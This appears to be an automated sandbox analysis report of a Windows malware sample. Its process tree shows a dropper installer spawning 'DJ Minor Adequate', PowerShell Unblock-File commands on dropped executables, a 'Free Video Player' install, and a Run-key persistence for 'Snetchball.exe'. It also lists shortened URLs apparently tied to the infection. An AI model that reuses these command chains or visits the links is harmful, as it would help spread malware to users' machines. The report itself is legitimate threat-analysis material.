msedge.exemsedge.exepid process 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 3116 wrote to memory of 3080 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3080 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 3860 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 4800 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 4800 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe PID 3116 wrote to memory of 2692 3116 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1IZk1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe22cf46f8,0x7ffe22cf4708,0x7ffe22cf47182⤵PID:3080
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:22⤵PID:3860
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4800 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:82⤵PID:2692
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:12⤵PID:1240
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:12⤵PID:4972
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:82⤵PID:2512
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4916 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:12⤵PID:2660
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:12⤵PID:1092
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:12⤵PID:4032
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:12⤵PID:1368
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1764 /prefetch:12⤵PID:1496
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:12⤵PID:1124
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:12⤵PID:2856
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6392 /prefetch:82⤵PID:836
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:12⤵PID:4364
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4896 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2884 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6644 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:404 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:12⤵PID:620
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6828 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2984
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1828
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4240
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1432
-
C:\Users\Admin\Desktop\setup_CU3cRmqhm4.exe"C:\Users\Admin\Desktop\setup_CU3cRmqhm4.exe"1⤵PID:4004
-
C:\Users\Admin\AppData\Local\Temp\is-NPFQQ.tmp\setup_CU3cRmqhm4.tmp"C:\Users\Admin\AppData\Local\Temp\is-NPFQQ.tmp\setup_CU3cRmqhm4.tmp" /SL5="$4021E,6120275,56832,C:\Users\Admin\Desktop\setup_CU3cRmqhm4.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1408 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"3⤵PID:4780
-
C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe"C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 2ad8c9944d9a5b4bd746bfd3542cea0b3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1112 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 8884⤵
- Program crash
PID:1784 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 8964⤵
- Program crash
PID:1392 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 9604⤵
- Program crash
PID:2632 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 10844⤵
- Program crash
PID:540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 11044⤵
- Program crash
PID:1940 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 11044⤵
- Program crash
PID:4836 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 11484⤵
- Program crash
PID:180 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 11844⤵
- Program crash
PID:1176 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 11564⤵
- Program crash
PID:2792 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 11404⤵
- Program crash
PID:2864 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 10004⤵
- Program crash
PID:768 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 17124⤵
- Program crash
PID:4356 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 13644⤵
- Program crash
PID:2300 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 14164⤵
- Program crash
PID:3812 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 12724⤵
- Program crash
PID:3204 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 14164⤵
- Program crash
PID:4804 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 21244⤵
- Program crash
PID:224 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://clck.ru/3Bsi4L4⤵PID:1596
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe22cf46f8,0x7ffe22cf4708,0x7ffe22cf47185⤵PID:1196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 19044⤵
- Program crash
PID:180 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 21804⤵
- Program crash
PID:2008 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 18964⤵
- Program crash
PID:3088 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 18924⤵
- Program crash
PID:2980 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 19004⤵
- Program crash
PID:228 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 21924⤵
- Program crash
PID:968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22004⤵
- Program crash
PID:3504 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 21804⤵
- Program crash
PID:2916 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22564⤵
- Program crash
PID:3576 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 20364⤵
- Program crash
PID:3712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 20284⤵
- Program crash
PID:2064 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 19764⤵
- Program crash
PID:4400 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 20244⤵
- Program crash
PID:2272 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22284⤵
- Program crash
PID:2736 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22324⤵
- Program crash
PID:3288 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 20524⤵
- Program crash
PID:780 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22604⤵
- Program crash
PID:3536 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22284⤵
- Program crash
PID:4204 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22284⤵
- Program crash
PID:2880 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\y7ZsR72z\lNdzzyFPAwOlp5XgSLE.exe"4⤵PID:4172
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\y7ZsR72z\lNdzzyFPAwOlp5XgSLE.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\DgdC3TvE\RP3U09NqkneL.exe"4⤵PID:2240
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\DgdC3TvE\RP3U09NqkneL.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22644⤵
- Program crash
PID:764 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\PDNFXBP9\lOyDlKbc.exe"4⤵PID:2064
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\PDNFXBP9\lOyDlKbc.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3660 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22164⤵
- Program crash
PID:3676 -
C:\Users\Admin\AppData\Local\Temp\y7ZsR72z\lNdzzyFPAwOlp5XgSLE.exeC:\Users\Admin\AppData\Local\Temp\y7ZsR72z\lNdzzyFPAwOlp5XgSLE.exe4⤵
- Executes dropped EXE
PID:764 -
C:\Users\Admin\AppData\Local\Temp\is-G7OL2.tmp\lNdzzyFPAwOlp5XgSLE.tmp"C:\Users\Admin\AppData\Local\Temp\is-G7OL2.tmp\lNdzzyFPAwOlp5XgSLE.tmp" /SL5="$2037E,4415326,54272,C:\Users\Admin\AppData\Local\Temp\y7ZsR72z\lNdzzyFPAwOlp5XgSLE.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:760 -
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -i6⤵
- Executes dropped EXE
PID:1092 -
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -s6⤵
- Executes dropped EXE
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\DgdC3TvE\RP3U09NqkneL.exeC:\Users\Admin\AppData\Local\Temp\DgdC3TvE\RP3U09NqkneL.exe /sid=3 /pid=10904⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1244 -
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:1216 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exeC:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Modifies Control Panel
PID:2052 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2868 --field-trial-handle=2872,i,15388689735004980344,1046342718699052538,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:27⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3860 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3024 --field-trial-handle=2872,i,15388689735004980344,1046342718699052538,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
PID:208 -
